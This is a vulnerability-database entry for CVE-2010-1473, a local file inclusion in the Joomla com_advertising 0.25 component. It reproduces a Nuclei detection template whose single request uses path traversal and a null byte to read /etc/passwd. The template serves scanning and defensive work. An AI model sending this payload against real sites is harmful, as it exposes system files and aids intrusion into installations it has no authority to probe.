Lucene search

K

Joomla! Component Advertising 0.25 - Local File Inclusion

🗓️ 05 Sep 2021 02:48:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

A vulnerability in Joomla! com_advertising 0.25 allows remote attackers to read arbitrary files and compromise the entire installation

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
ReporterTitlePublishedViews
Family
Dsquare
Joomla Component com_advertising 0.25 LFI
6 Feb 201200:00
dsquare
Prion
Directory traversal
19 Apr 201019:30
prion
Cvelist
CVE-2010-1473
19 Apr 201019:04
cvelist
NVD
CVE-2010-1473
19 Apr 201019:30
nvd
CVE
CVE-2010-1473
19 Apr 201019:30
cve
Tenable Nessus
Joomla! / Mambo Component Multiple Parameter Local File Include Vulnerabilities
4 Jan 201000:00
nessus
id: CVE-2010-1473

info:
  name: Joomla! Component Advertising 0.25 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12171
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1473
    - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-1473
    cwe-id: CWE-22
    epss-score: 0.00826
    epss-percentile: 0.8192
    cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: johnmccollum
    product: com_advertising
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,johnmccollum

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022017189a9f4ee23d444cd8d8a719f1ffbf6f9f474fc93b5e6f0de8ce2716750e8502200d19eeb639ba6c59ee0e5e023c7fdffd9b502e0e3085a2bb01bd383e74f8f412:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 Sep 2021 02:03Current
6Medium risk
Vulners AI Score6
CVSS26.8
EPSS0.03149
14
.json
Report